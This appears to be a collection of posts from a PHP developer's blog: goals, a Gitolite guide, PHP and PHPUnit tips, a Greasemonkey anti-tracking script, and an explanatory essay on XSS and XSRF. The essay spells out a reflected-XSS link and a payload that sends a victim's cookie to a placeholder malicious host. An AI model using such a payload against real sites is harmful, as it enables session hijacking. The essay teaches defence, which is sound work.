Future Plans


So, you're all probably wondering: what are the big plans for www? Ever since I purchased markizano.net, I've wanted to build a place where people could come and see my work. I wanted to (with permission) keep working copies of my clients' sites as empty mirrors or sandboxes for testing and viewing purposes; I would keep the applications in a virtual environment and reset the database on a timed interval. I also wanted to publicly host code I had written, both as an example of what I can do as a developer and as a personal archive of things I've published, so I could see how I develop as a software engineer. How does my code formatting change over time? How does my architecture develop with each new release? What new concepts do I employ as time goes on?

I think I'm finally at a point where I can get my site to behave the way I envisioned long ago. I'll be using a CMS to create a front end where you'll have the chance to view my work, my GitHub, my resume, my blog, and whatever other trinkets and toys I decide to add to the application.


6-Month Review

So, about six months ago, I set myself a set of goals to accomplish by this point
in my life. I think now would be a good time to review those goals and see how far
I've come since then.

I set out to accomplish my Zend PHP 5.3 certification, more security-oriented programming,
and more front-end development. Since then, I have earned my PHP 5.3 certification,
and I have started developing more applications that involve JavaScript.
I have not quite gotten involved in more security-oriented programming, but that is
yet to come. I have to say I'm proud of what I've accomplished thus far, and I would
like to continue this trend.

Goals for the next 6 months

  1. Security-Oriented Programming

    I want to continue pursuing more security-oriented programming. Now that I have
    an opportunity with HealthPlan Services, dealing with the HIPAA standards,
    I think I will have a better shot at this goal.

  2. Kizano CMS

    I have plans to build a CMS that's unlike any before it. I've seen many a CMS
    built on top of the Zend Framework. However, I disagree with the implementation
    of these systems: they aren't really built to extend the ZF, but instead just
    use the ZF for a few of its components. I want to build a system that is truly
    built on top of the ZF and is made to actually extend the functionality it
    provides. Not only that, but I also want to build the first framework that
    actually follows ALL of the ZF coding standards. Anyone is welcome to contribute
    to this project if they wish.

  3. Zend Certification

    Now that I've obtained my Zend certification in PHP/5.3, I want to obtain the certificate
    in the framework as well to tell employers that I do have a solid background in PHP and
    the ZF, and that I am very capable of handling myself in such a work of art.

  4. ZF Developer-Contributed Modules

    There is a repository I'm hosting that I hope will come to contain a series of
    developer-contributed work: modules, views, and controllers that other developers
    have created and added to the project, so that future developers can simply copy
    these modules and controllers into their own projects and run with them instead
    of re-inventing the wheel.

There are probably more goals in my life that I want to accomplish; however, these are
the main ones for the next six months. I think I'm going to break the tradition of
only having three goals, and instead just set down a number of things I want to see
happen in my life within the next six months.

Gitolite Install

In recent weeks, I've been curious about Github
and how they host their private/public repositories. It was obvious they used SSH to
establish the connection, which I thought was awesome from a security standpoint. However,
for personal educational gain, I was curious how they did it. I ran across a Google search
result that said you could host your own
private GIT server.
So, I followed the user's advice and found it was rather easy to use a generic SSH connection
to establish your own private GIT repository. I thought it was really awesome, but after
a while, I wanted to show my work off to a select few, but at the same time, the idea of
just about anybody having SSH access to a user on my system just wasn't ideal. So, I looked
for the authentication method used to manage users accessing the GIT server in question
and found this nifty thing called Gitolite.

Gitolite is a fork of an older code base that was used to manage users who connect
to the same server under the same [and potentially other] user accounts. In order for
this to work properly, though, one must disable password authentication and set up the
user(s) for the git repositories.

I figured it would be a good idea to retrace my steps and provide a starter guide for
those trying to setup their own GIT server repos and need the right kind of nudge to
create a place where private GIT repositories can be stored.

First things first: install git and SSH. This can be done through the package manager. I'll
assume that, as the astute system administrator you are, you'll understand how to install GIT
and SSH. Please note: on Debian-based systems, `git-core' provides both the client and the
server as you will see in this post; the `git' command is sufficient to manage both client
and server repositories.

Once you have the basics down, it's time to install the GIT gateway. Debian comes with a
gitolite package available for installation. I highly recommend this tutorial on
installing gitolite.
Please heed the advice on familiarizing yourself with SSH keys as you will need that to
understand how gitolite works in authenticating users.
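If you've never generated an SSH key pair before, a minimal sketch looks like this (the paths are just examples; in practice, accept the defaults and set a real passphrase):

```shell
# Generate an RSA key pair with no passphrase (-N '') into /tmp/gitadmin.
ssh-keygen -t rsa -b 2048 -N '' -q -f /tmp/gitadmin

# gl-setup expects the *public* half of the pair, with a .pub extension.
ls -l /tmp/gitadmin.pub
```

The private half (/tmp/gitadmin here) stays with you; only the .pub file is ever handed to gitolite.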

Run `gl-setup [key]' where [key] is the public key you want to use as the git administrator.
Be sure to copy the file to a temporary directory and ensure it ends with a .pub extension.
Also, ensure this command is executed as the user you intend to own the GIT repositories.
Typically, the public key of the GIT administrator is selected so that it may have access
to the admin repository. Once that's set up, you should have a ~/repositories directory,
and your ~/.ssh/authorized_keys file should have changed as well. Now, when you
execute `ssh git@localhost' (if `git' is the user selected for GIT administration),
you should see you have access to a repository called `gitolite-admin'. Run the following
command to check out a copy of this admin repo:

git clone git@localhost:gitolite-admin.git ~/gitolite-admin

That should clone a GIT repository into your home dir. To grant a user access in the ACL,
merely add their key to the ./keydir/ directory and ensure their name is in
./conf/gitolite.conf. The syntax is defined in the gitolite documentation.
Commit and push your changes. You will note that gitolite automatically configures
itself as necessary on push, so there's no need to worry about the raw configuration in
the repo.


If the group name defined is the same as the username, then it is unnecessary to include
the user's group identifier in the definition for the user. For example, let's assume we
have the key joe@example, and that the configuration defines the group @example.
In the config, there would be no need to say:

@example = joe@example

repo projects/testing
    RW+ = @example

However, if joe is to be defined in a different group, the full identifier (`joe@example')
would be required. This lesson was learned the hard way by yours truly ;)

EDIT (2011-12-28): I found out that the filenames match the permissions in the gitolite.conf file. So, let's assume you have the key by `user@example.com'. You would put that in `keydir/user_example.com.pub'. In conf/gitolite.conf, you would refer to the user `user_example.com'. I would discourage the use of the "@" character in filenames referencing the keys.
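To illustrate (all names here are hypothetical), a key stored as keydir/user_example.com.pub would be referenced in conf/gitolite.conf by its basename, like so:

```
# keydir/user_example.com.pub is referenced as "user_example.com"
@devs       = user_example.com
repo projects/testing
    RW+     = @devs
```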

** For those of you who use a different flavor of Linux, be it Slackware, RedHat, CentOS,
Gentoo, ArchLinux, or anything else, feel free to hit me up with the package name and
package manager, and I'll update this post with the appropriate command for the selected
distribution. I'm sure this can also be done in Windows, but it's been so long since I've
managed a Micro$oft-based server that I'm almost completely out of touch with it. Again, if
there are suggestions on how to install and manage GIT, feel free to contact me and I'll
update this blog post.

ZF Github


Hey all,
I just wanted to throw a heads-up out to the ZF world. I've created a place where we can all come together as a community and maintain a repository of application-specific models, views, and controllers. This can be an open compilation of everybody's contributions, aimed at saving each other work by providing a place where generic modules can be popped out of this project and into any other.

If anybody has a generic component, such as a basic login, registration, or contact-us form, or another module that's generic enough to go in just about any ZF-based project, and you're willing to release it under the BSD license, then feel free to fork a copy of this repository, add your changes, and request a merge. I'll be working as best I can to maintain this so we can all have a ZF repository of modules, controllers, and views.

"The Cave"

I'm having to take a class titled, simply, Philosophy. I just
wanted to take a moment to reflect on some of the text we were
given to read and note my interest in this particular subject.
Following is an excerpt from the text, which quite accurately
depicts what I see happening around us all every day:

The Cave

In the Republic, Plato uses a vivid allegory to explain his
two-realms philosophy. He invites us to imagine a cave in which
some prisoners are bound so that they can look only at the wall
in front of them. Behind them is a fire whose light casts shadows
of various objects on the wall in front of the prisoners. Because
the prisoners cannot see the objects themselves, they regard the
shadows they see as the true reality. One of the prisoners
eventually escapes from the cave and, in the light of the sun,
sees real objects for the first time, becoming aware of the big
difference between them and the shadow images he had always taken
for reality.

The cave, obviously, represents the world we see and experience
with our senses, and the world of sunlight represents the realm
of Forms. The prisoners represent ordinary people, who, in taking
the sensible world to be the real world, are condemned to
darkness, error, ignorance, and illusion. The escaped prisoner
represents the philosopher, who has seen light, truth, beauty,
knowledge, and true reality.

Of course, if the philosopher returns to the cave to tell the
prisoners how things really are, they will think his brain has
been addled. This difficulty is sometimes faced by those who have
seen the truth and decide to tell others about it.

However, I believe the people who see the light of day are not
just philosophers, but the educated in general, and that those
who refuse to accept more than the shadows they see in the cave
as their reality are more like the ignorant and uneducated.
Society has changed a bit in that the majority of people are no
longer utterly dependent on religion and God, but have other
ideas of their own to express. People have not changed, however,
in that there are still those who are aware of their ignorance,
and those who are completely oblivious.

Just merely making note of the obvious here.



Knowledge is the essence of education.
Knowledge is truth. Knowledge is the collection of facts and data, statistics and analysis. Knowledge is good for retention, reference, and remark.


Intelligence is the essence of interpretation.
A person can be knowledgeable, but that data is meaningless if it cannot be interpreted. Intelligence breeds the inception of concepts, spider webs of connections, and interpretations of anticipation. Intelligence is the adaptation to the surrounding environment; the interpretation of change in data over time.


Smartness is the essence of wit.
Smart is the ability to adapt to change quickly and efficiently, the ability to perform impromptu scenarios such that they emerge the victor of the obtained goal; Social Engineering at its finest.

Career Goals

Since I began working for this company known as Integraclick/Clickbooth, based out of Sarasota, FL, I've been asked to generate a list of goals I wish to accomplish within the next six months. My goals are as follows:

  1. Zend Certification

    How I plan to achieve this goal:

        I would like to become Zend certified in PHP 5.3, and later Zend certified in the Zend Framework. I'm going to work through the study guides and schedule to take the test sometime in early February. Taking the Zend certification on the Zend Framework will take a bit more time to study and prepare for, as it will be in combination with my already-scheduled online courses with UOPX.

  2. Information Security

    How I plan to achieve this goal:

        I will start spending more of my free time studying the details of Information Security. For example, getting to know tools such as metasploit, BackTrack, and other pentesting tools. I would like to engage in more activities at work that deal with Information Security as well.

  3. Become more proficient at front-end development
    How I plan to achieve this goal:

        I am currently not that versed in front-end development. I know enough about JavaScript to get the basic concepts, and I could develop some really interesting applications if given the chance. One of the things that shied me away from getting into JavaScript was that it was implemented so many different ways across browsers. Now that frameworks such as MooTools, jQuery, Prototype, and YUI are available, I am more apt to learn the ins and outs of JavaScript and how it behaves.

        I can't say that I would like to do much development with CSS as I dislike making things look pretty. I find beauty in the architecture of the application as opposed to how many lovely pictures it has. Therefore, I want to further clarify that I would like to work with the front-end functionality of the page and not necessarily the way it should look in a particular browser.

Resource Performance

You ever run your application and realize it's taking a long time to process?

It would probably be a good idea to take a look at your application and see how many times
you open and close a resource or a stream. If you have a lot of functions that open a stream,
query it, and then close it again, then that is likely the bottleneck of your application.

In order to reduce the amount of time it takes to process the application, it's usually best to
open the streams to the resources you need when the application starts, and close them when the
application ends. Here's an example class that deals with files:

class FileHandler
{
    /**
     * Implements the singleton pattern.
     * @var FileHandler
     */
    protected static $_instance;

    /**
     * Holds the current file pointer.
     * @var resource File pointer
     */
    protected $_fp;

    /**
     * Starts up the resource handler.
     * @param string $filename The path to a file to open.
     * @return void
     */
    public function __construct($filename = null)
    {
        if ($filename !== null) {
            $this->openFile($filename);
        }
    }

    /**
     * Closes the file handler and destroys this object.
     * @return void
     */
    public function __destruct()
    {
        $this->closeFile();
    }

    /**
     * Opens a new file resource.
     * @param string $filename The name of the file to open.
     * @return void
     */
    public function openFile($filename)
    {
        if (!file_exists($filename)) {
            throw new Exception("Could not open file: $filename");
        }
        if (!is_readable($filename)) {
            throw new Exception("Could not read file: $filename");
        }

        // Open the file for reading and writing, placing the file
        // pointer at the beginning of the file.
        $this->_fp = fopen($filename, 'r+');
    }

    /**
     * Gets the file handle.
     * @return resource File pointer
     */
    public function getHandle()
    {
        return $this->_fp;
    }

    /**
     * Closes the file stream.
     * @return void
     */
    public function closeFile()
    {
        if (is_resource($this->_fp)) {
            fclose($this->_fp);
            $this->_fp = null;
        }
    }
}
Note how this object opens a pointer to a file on instantiation and
closes the file pointer when the object is destroyed. That means, if
you create an instance of this class and use it throughout your application,
as opposed to writing functions that simply open a resource, query the
file, and then close the resource, you'll be surprised at the impact
such a small change can have on performance. Multiply that by
the number of users that could be accessing your application concurrently,
and the savings in resources will be phenomenal!

It's important to structure your application so that you open a resource
as few times as possible. This doesn't just apply to files; it applies
to all streams, including database connections, network streams,
and anything else that involves reading and writing. In addition, each
call to read from or write to the stream is also a costly operation. It's
best to gather as much data as possible per trip to the stream: obtain
all the information you will need before you process it. Once you've
obtained the necessary information, you should be able to process the
data without issue. Follow up with a final write to the stream to save
the data, if necessary, and then close the stream as you exit the
application.
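The open-once principle above can be sketched with plain functions and a throwaway temp file (names here are mine, not from the post):

```php
<?php
// Wasteful pattern: every call reopens and recloses the file.
function countLinesWasteful($filename) {
    $fp = fopen($filename, 'r');
    $count = 0;
    while (fgets($fp) !== false) {
        $count++;
    }
    fclose($fp);
    return $count;
}

// Better pattern: the caller opens once and passes the handle around.
function countLines($fp) {
    rewind($fp);
    $count = 0;
    while (fgets($fp) !== false) {
        $count++;
    }
    return $count;
}

$tmp = tempnam(sys_get_temp_dir(), 'fh');
file_put_contents($tmp, "alpha\nbeta\ngamma\n");

$fp = fopen($tmp, 'r');     // one open for the whole run...
echo countLines($fp), "\n"; // 3
echo countLines($fp), "\n"; // 3 -- a second pass needs no reopen
fclose($fp);                // ...one close at the end
unlink($tmp);
```

Each call to countLinesWasteful() pays the open/close cost again; countLines() pays it exactly once per run, no matter how many times it is called.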

Following these simple steps can lead to a more efficient and faster
application.

phpMyAdmin -> Adminer

Okay, so one day, I sit down at my system and refresh the page on https://phpmyadmin/ to get the most up-to-date information from the database, only to find that the page was blank! I got a white page with nothing on it. I checked the source code, and the text was still there. I looked in Firebug, and there were no errors. Later, I checked Apache's error logs, and they were blank (except for the expected warnings about an invalid security certificate). I checked the PHP logs, and there was nothing to be reported (on E_ALL & ~E_NOTICE <- which I despise, btw).

I am not very keen on debugging phpMyAdmin, because I realize it was written with PHP4 in mind; there is no separation between the logic and presentation in an MVC-style fashion.

Adminer is an awesome single-file application. It does pretty much everything phpMyAdmin does except search... and it's lightning fast! Not like phpMyAdmin, which can take loads of time to generate all that HTML. I was a little skeptical that a single file could accomplish all of this, but it does, and in just under 250KB! For anybody who is having issues with phpMyAdmin and is looking for a lightweight web-based RDBMS front-end, Adminer is definitely the way to go!


PHPUnit Taking Forever to Run

I was tasked to create some PHPUnit tests for a project at work, but I was having an issue running the tests because they were taking forever to load, even for a single small test that just asserted a true statement. So, I went googling for some kind of answer and found a thread on the subject in the ZendFramework mail archive.

Basically, you just want to check your phpunit.xml file and ensure you only whitelist the files and directories you want covered by the tests. Don't add excludes unless they fall within your whitelist.

To put this into an example, let's assume you have a phpunit.xml similar to this:

<phpunit bootstrap="./tests/bootstrap.php">
    <testsuites>
        <testsuite name="MyTest-Application">
            <directory suffix=".php">tests/application/</directory>
        </testsuite>
    </testsuites>
    <filter>
        <whitelist>
            <directory suffix=".php">tests/</directory>
            <directory suffix=".php">build/</directory>
            <directory suffix=".php">htdocs/</directory>
            <directory suffix=".php">library/Doctrine</directory>
            <directory suffix=".php">library/Zend</directory>
            <directory suffix=".php">logs/</directory>
            <directory suffix=".php">scripts/</directory>
            <file suffix=".php">application/controllers/ExampleController.php</file>
            <directory suffix=".php">application/</directory>
            <exclude>
                <directory suffix=".php">application/models/</directory>
                <file suffix=".php">application/setup.php</file>
                <file suffix=".php">application/Bootstrap.php</file>
            </exclude>
        </whitelist>
    </filter>
</phpunit>
Note that this file lives in the root of your project, right? You refer to the tests/ directory since that contains the bulk of your tests, right? However, you are also telling PHPUnit to parse and search your entire application for tests. This is bad practice, IMO, because 1) the parser must now parse ALL of your code instead of just the pieces containing tests, 2) it can consume a lot of resources in this parsing process, and 3) it's very rare that you will find real PHPUnit tests within the main part of the application. PHPUnit tests are commonly kept outside of the application in their own directory.

The above phpunit.xml file should be corrected to reflect something like the following:

<phpunit bootstrap="./tests/bootstrap.php">
    <testsuites>
        <testsuite name="My-Application">
            <directory suffix=".php">tests/application/</directory>
        </testsuite>
    </testsuites>
    <filter>
        <whitelist>
            <directory suffix=".php">./tests/</directory>
        </whitelist>
    </filter>
</phpunit>

Note how the whitelist has been changed to point only to the tests directory, searching only for files with the suffix .php.

If your project is under Subversion control, then the first configuration would likely cause PHPUnit to search ALL files in ALL directories, and that includes the .svn directories in every single subdirectory of your project. This means the first configuration would cause PHPUnit to search not only your entire project for test files, but also every .svn directory beneath it, increasing the time required to parse and execute the tests. So, if your PHPUnit runs are taking 50+ seconds for one measly test, take a look at your phpunit.xml file and make sure you are whitelisting only the files you need included in the test. Do not blacklist directories or files unless they are already a part of your whitelist and you need them excluded. This should reduce the run time of your PHPUnit scripts by a tremendous amount!



Google Analytics

We all know about the mega-massive search giant known as Google. They also have this obsession with tracking their users. I am familiar with this tracking system on a minor scale, and I do my best to avoid it, just because I can. For those of you who don't like Big Brother looking over your shoulder, but still want to enjoy the services he provides, you'll probably want to keep reading, because the script I have for you enables you to search on Google without too many of their tracking systems getting in your way.

Personally, I browse in Firefox, and I use the extensions NoScript and RequestPolicy to help protect me against a lot of the unwanted things people like to embed in their websites, be they scripts or even advertisements. In most cases, I can block the google-analytics embedded in other people's websites as well.

Google likes to embed things in the links that you click. This is how they keep track of what you click, so they can order their links appropriately. When you click on a link in their search results, they used to do one of two things. At first, there was an "onclick" event attached to the link: when you clicked it, it would change the destination to "http://www.google.com/url?url=[The URL]". This irked me in all the wrong ways, because it was like Google was sneaking something under your link before you clicked on it. That /url?url= actually pointed to a part of the Google application, which I suspected tracked the link, the time you clicked, the related search, what you ate last week, and all the other crazy little things they thought were necessary relating to that link. Once you landed on that /url?url= page, it would send a 302 redirect to your destination. At this point, RequestPolicy would step in and say that's not allowed, because technically, Google was making a request to an unauthorized third party.

When I noticed this, I created a GreaseMonkey script to iteratively remove the "onclick" from all of the search results. This worked for a while, until (again, I suspect) Google found out about this and didn't like it. So, instead, they changed their links to activate on an "onmousedown" handler. This was no problem, as I simply added the removal of the onmousedown handler to my GreaseMonkey script as well. That worked for the longest time, until just recently, after Google Instant was released.

I laugh at this because (again, I suspect) Google said "fuck it" and just took out the on{whatever} handlers. Now every single search result points to /url?url=[your search result]. I applaud Google for their persistence, but they aren't going to stop me. It took a bit of work and string manipulation, but I modified my GreaseMonkey script to remove the bullshit from Google's analytics. The code sample below is the result of my efforts. It removes all attached onmousedown and onclick events from the search results, then finds the target of each search result and strips out the Google tracking data.

You can also click here to quickly install this script into your GreaseMonkey extension :>

// ==UserScript==
// @name Google-Analytics
// @namespace http://www.google.com/
// @description Kills Google Scripts from being able to track my clicks >D
// @include http://www.google.com/*
// ==/UserScript==

var a = document.getElementsByTagName('a'), link, index;
for (var i = 0; i < a.length; i++) {
    // Strip the tracking handlers attached to each result link.
    a[i].removeAttribute('onclick');
    a[i].removeAttribute('onmousedown');
    link = a[i].getAttribute('href');
    if (link && link.indexOf('/url?url=') != -1) {
        // Cut off everything up to and including "/url?url="...
        index = link.substr(link.indexOf('/url?url=') + 9);
        // ...and drop any trailing tracking parameters.
        link = index.indexOf('&') == -1 ? index : index.substr(0, index.indexOf('&'));
        a[i].setAttribute('href', unescape(link));
    }
}

Happy tracking-less browsing! ;)



Cross-Site Scripting (XSS) and Cross-Site Request Forgery (XSRF) are quite prevalent today and can cause quite a bit of damage. They take advantage of a session by exploiting the cookie. Mike Bailey and Jeremiah Grossman are both excellent information security researchers, for Mad Security and WhiteHat Security, respectively. OWASP is the Open Web Application Security Project. WASC is the Web Application Security Consortium. Not everything in this document is covered in detail; for the sake of scope, only the basics of web development are covered. The rest of this document describes XSS and XSRF in detail and the controversy around them.

XSS and XSRF Security

Let's imagine that you are browsing the Internet, and you receive a notification via email that your account was locked because of an excessive number of incorrect login attempts. You rush to click the convenient link within the email to visit your bank and investigate the issue. You attempt to log in to the site, and your login fails the first time, but you notice something funny as the page proceeds to your bank and requests that you log in again. So you log in again, and it brings up your account. Your funds are safe; you breathe a sigh of relief. You click on the activity link to double-check your last transaction. When the next page loads, you see that your account was dumped, and you've been duped. What the heck just happened?!

This is a common exploit brought to you by XSS and XSRF. XSS is Cross-Site Scripting. XSRF is Cross-Site Request Forgery. Cross-Site Scripting works by injecting arbitrary code into a web page. This code can do anything, from telling the hacker the cookie associated with a session, to completely defacing the website to make it look like a completely different site! Cross-Site Request Forgery works by requesting resources from a remote location, either to perform an exploit or to aid in one.

Evidence for this comes from Mike Bailey, Jeremiah Grossman, OWASP, and the WASC. Bailey is a former security researcher for Foreground Security; now he works for Mad Security. Grossman is the founder and CTO of WhiteHat Security. OWASP is the Open Web Application Security Project: "OWASP is a 501c3 not-for-profit worldwide charitable organization focused on improving the security of application software" (OWASP, 2010). WASC is the Web Application Security Consortium: "The Web Application Security Consortium (WASC) is an international group of experts, industry practitioners, and organizational representatives who produce open source and widely agreed upon best-practice security standards for the World Wide Web" (WASC, 2010).

Cookies and Sessions

Cookies are small pieces of data stored on the hard drive and used to keep track of a session. A session is used to keep track of a user's activity on the web. A cookie used to keep track of a session is known as a session cookie. Submitting a session cookie to a website is like unlocking the door to a profile on the website. First, the website will create a cookie and a session for the user, which are stored on the server. Next, the website will send the cookie to the user, the web browser will take note of that cookie, and store it on the hard drive for later use. The browser then sends the cookie to the website at each page-load. The act of the browser sending the cookie to the website is like unlocking a personal door to an account on the website.

For example, suppose a user visits a website such as http://amazon.com and searches for books. When that user logs in, the website must keep track of this user among hundreds or potentially thousands of other users. This is accomplished via a session. Information such as login credentials, site preferences, and the like is all stored in that session. A cookie, by contrast, is only a small piece of information; a cookie is literally just characters, such as PHPSSID="F7A72D21." The website stores the session and its associated information. With this kind of setup for authentication, anybody with the same cookie can submit it to the website and gain access to the credentials owned by that user. This is why it is important to log out when finished using a website.
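That lookup can be sketched as a toy example, with the server's session store faked as a plain array (all names and values here are made up):

```php
<?php
// The server's session store, keyed by session ID. In a real PHP app
// this lives in session files or a database, not a literal array.
$sessions = array(
    'F7A72D21' => array('user' => 'joe',  'cart' => 2),
    '9C01BEEF' => array('user' => 'anna', 'cart' => 0),
);

// The browser presents its session cookie on every request...
$cookie = 'F7A72D21';

// ...and the site uses it as the key into the session store.
$profile = isset($sessions[$cookie]) ? $sessions[$cookie] : null;

echo $profile['user'], "\n"; // joe
```

This is exactly why a stolen cookie is as good as a password: anyone presenting "F7A72D21" gets joe's session.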


XSS

XSS is known as Cross-Site Scripting. XSS is accomplished by injecting arbitrary code into a website. This code is capable of executing in the web browser to include other scripts, deface a website, give a hacker information about the server or the web browser, and much more. Injecting arbitrary code into a website's URL is one common way to mount an XSS attack. Other methods include injecting scripts into form fields whose values the site later displays back to the browser, which the browser then executes.

XSS can accomplish almost anything JavaScript can do. On a small tangent, JavaScript is the scripting language that runs in the browser. It does everything from manage cookies, to bringing aesthetics to a web page by making it interactive, to making arbitrary requests to the website for more information. XSS uses JavaScript to perform malicious actions on a website, which may include manipulating the page to deface a site, stealing a user's cookie, and redirecting a user to other malicious websites, which can deal more damage to the user's computer.

Failing to validate and escape input is a common way in which developers allow for XSS attacks. When data is submitted from a form to a website, the website is supposed to take that data and validate it, to ensure it is the type of data the website expects to process. Then, before the website outputs that data back to the browser, it is supposed to escape the data according to the rules that make up the page. Failure to do so can result in unexpected results.
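In PHP, the escape-on-output step described above boils down to htmlspecialchars() (a minimal sketch; real code also validates on input):

```php
<?php
// A value as it might arrive from a form field or query string.
$input = "<script>alert('b0rk')</script>";

// Escape it before echoing it back into HTML, so the browser renders
// it as text instead of executing it.
$safe = htmlspecialchars($input, ENT_QUOTES, 'UTF-8');

echo $safe, "\n";
// &lt;script&gt;alert(&#039;b0rk&#039;)&lt;/script&gt;
```

With the angle brackets and quotes encoded, the injected script is displayed harmlessly rather than run.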


XSRF

XSRF is known as Cross-Site Request Forgery. By using Cross-Site Request Forgery, a hacker can manipulate a website on a user's behalf. XSRF can happen when a hacker gets control of a user's session by submitting the user's session cookie to the website. XSRF can be accomplished by injecting arbitrary code into the URL or into any form of a website; that code is then displayed back to the browser, and the browser executes it.

On the developer's side, there are methods to defend against these attacks. One common measure is HTTPOnly: a flag on the cookie that prevents JavaScript from reading it, which keeps an XSS payload from stealing the session. For XSRF specifically, the standard defense is a secret per-session token embedded in every form, so the site can verify that a request actually originated from its own pages.
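
Setting the HttpOnly flag from PHP is a one-liner either way. The browser still attaches the cookie to every request, but scripts (including an injected XSS payload reading document.cookie) cannot see it. The session ID value below is illustrative:

```php
<?php
// Option 1: set the flag on a cookie you create yourself.
// setcookie(name, value, expire, path, domain, secure, httponly)
// The seventh parameter is the HttpOnly flag (PHP 5.2+).
setcookie('PHPSESSID', 'f7a72d21', 0, '/', '', false, true);

// Option 2: tell PHP's own session handler to mark its cookie HttpOnly.
session_set_cookie_params(0, '/', '', false, true);
session_start();
```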

The Counter-Argument

Some people may argue that XSRF and XSS are not a problem, or at least not a threat. They may claim that "even with some of the best commercial Web vulnerability scanners" (Beaver, 2010), XSRF and XSS are not much of a threat. Some may say that XSS and XSRF are difficult to perform, and that it is not likely a user will fall for such a trick.

To counter this argument, it must be said that XSS and XSRF are not difficult to perform at all. And exactly which "best commercial vulnerability scanners" are being referenced? If it is so unlikely that a user will fall for an XSS or XSRF attack, then why do hundreds of users fall victim to these kinds of attacks every day?

To debunk these myths, here is an example of what an XSS attack link can look like:

http://some-website.example/search.php?q=%3Cscript%3Ealert('b0rk')%3C%2Fscript%3E

To the average person, this may not look like much beyond a bunch of garbled numbers, letters, and symbols. To someone who knows what it means, however, it spells disaster for anyone who clicks a link formed in this fashion. This particular link is fairly harmless: it simply pops up an alert box containing "b0rk". However, if you change the "alert('b0rk')" part of that URL to something different, such as "document.location.href='http://malicious-website.org/malicious-script.php?thief='+escape(document.cookie)", then there would definitely be something very wrong with this URL.

To explain this in more detail: anything past the question mark in a URL is known as the "query string". Web applications use the query string to control their behavior. If the variables in the query string are echoed back into the page without being properly escaped, they can execute in the browser. The replacement payload above hands the user's cookie to a malicious website, which could then email the cookie to the hacker and forward the user along like nothing happened. The user would not even notice. The hacker can then use the stolen cookie to log in as the user without their credentials, change their account preferences, and mount a far more devastating attack against the user, the website, or the server.
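
The vulnerable pattern behind a link like this is simply a page that echoes a query-string variable straight into its HTML. A minimal sketch in PHP; the page name and the q parameter are assumed for illustration:

```php
<?php
// Hypothetical search.php: reads a query-string variable.
$query = isset($_GET['q']) ? $_GET['q'] : '';

// BAD: whatever was in the URL is sent to the browser, markup and all.
// With ?q=<script>alert('b0rk')</script>, the browser executes the script.
echo "You searched for: " . $query . "\n";

// The same line with output escaping renders the payload as inert text.
echo "You searched for: " . htmlspecialchars($query, ENT_QUOTES, 'UTF-8') . "\n";
```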

Commercial software such as McAfee, Symantec, Trustwave, Trend Micro, and the like have no way to protect users against attacks like XSS and XSRF. Anti-virus suites try to prevent the user from downloading malicious content, or they discover malware already installed on the system and specialize in removing it. They cannot protect against activity that takes place within the browser, because the user's computer trusts the browser and its activities. Those who argue that XSS and XSRF are not a threat merely because anti-virus software does not detect them are highly mistaken.

For those who say that XSS and XSRF are difficult to perform: if one were to follow the link posted earlier to scrippsnews.ucsd.edu, then congratulations, a hack was just performed. It takes nothing more than a basic understanding of a web application to know how to break one.

The Evidence

Mike Bailey, Jeremiah Grossman, OWASP, and the WASC all agree that, from a web developer's perspective, the best way to prevent XSS and XSRF attacks is to follow two simple programming practices: validate all input, and escape all output. This simple discipline negates the majority of the attacks that can compromise a website. OWASP and the WASC have both recently published rankings of the most dangerous exploits of 2010.

XSS and XSRF rank 2nd and 5th respectively on OWASP's top 10: http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project

The WASC, meanwhile, has compiled a much more thorough listing of exploits relating to XSS and XSRF: http://projects.webappsec.org/Web-Application-Security-Statistics

OWASP also maintains a free and open library of code that anybody can use to help make their applications more secure: the Enterprise Security API, or ESAPI.

The Exploit

Here are a few screenshots of some exploits:

[Exploit screenshots] (Mckt, 2010)

For those who cry in vain, "I just paid a lot of money for an expensive security certificate! How could my site have been hacked?!": consider that XSS and XSRF do not care whether the user is on HTTP or HTTPS. A security certificate makes no difference, because XSS and XSRF attacks happen in the browser, after the traffic has been decrypted.


Again, websites do not have enough protection against XSS and XSRF, and a stronger movement needs to be made to prevent these kinds of attacks. Based on the evidence above, it is quite a challenge to claim that XSS and XSRF are not an issue. Both are fairly easy exploits, and they deserve constant vigilance when dealing with the Internet.

To protect against these kinds of attacks: avoid Internet Explorer, and take advantage of Firefox's NoScript and RequestPolicy addons. Log out of websites when finished, to minimize the window for an attack on a session. Most malware requires the user to interact with it in some way, shape, or form, so being aware of what is actually happening on the Internet is an excellent first step toward preventing infections, phishing scams, and the like. Pay attention to the URL of every website visited, and be vigilant about as much activity as possible while browsing. Finally, do not blindly trust a single website while exploring the Internet: not the bank's website, not a personal website, and definitely not Facebook. The Internet is an extremely scary place.


References

Kevin Beaver. (2010). Is cross-site request forgery (CSRF) really as dangerous as vendor hype suggests? Retrieved May 27, 2010.

Mike Bailey (Mckt). (2010). Website Security Seals Smackdown. Retrieved May 11, 2010.

OWASP. (2010). Open Web Application Security Project. Retrieved May 5, 2010.

WASC. (2010). Web Application Security Consortium. Retrieved May 5, 2010.

Circular Reference


I just recently ran into something that had me stumped for quite a while before it smacked me in the face
like a ton of bricks. It's better to explain with examples, so excuse the gobbledygook below if you're
reading this and were expecting plain prose, okay?

For those of you familiar with software languages such as C/C++, Java, and Basic, you may be familiar with this
concept of passing variables by reference and by value. For those of you that don't know, this will be good exposure,
and an awesome lesson to learn at an early stage to prevent hours of FaceDesking. :P

What's a Reference?

In PHP, as in several other languages, you pass by reference using the ampersand (&) operator, like so:

function myAdd(&$var, $amount = 0){
    $var += $amount;
}

$toAdd  = 5;
$amount = 3;
myAdd($toAdd, $amount);
var_dump($toAdd); // int(8)

Normally when you pass a variable in a function, you are passing the value of that variable to the function.
When you pass the reference to a variable, you are passing a pointer to the piece of memory that represents
that variable. So, instead of passing the value of "5" to the function, it's almost as if I'm passing the
variable $toAdd itself.
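
The difference is easiest to see side by side. A minimal sketch (the function names are mine, not from the example above): addByValue() receives a copy of its argument, while addByRef() receives the variable itself.

```php
<?php
function addByValue($var, $amount) { $var += $amount; } // works on a copy
function addByRef(&$var, $amount)  { $var += $amount; } // works on the caller's variable

$toAdd = 5;
addByValue($toAdd, 3);
var_dump($toAdd); // int(5) - only the copy changed, $toAdd did not

addByRef($toAdd, 3);
var_dump($toAdd); // int(8) - the function modified $toAdd itself
```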

You can also return a variable by reference. Doing so requires an ampersand in the function declaration,
like so:

function &reference($val){
    return $val;
}
This function is declared to return a reference to the value that was passed to it. Not much use on its own, but references
have their moments to shine. They are used [excessively, in my opinion] throughout the PEAR libraries.

Circular Reference

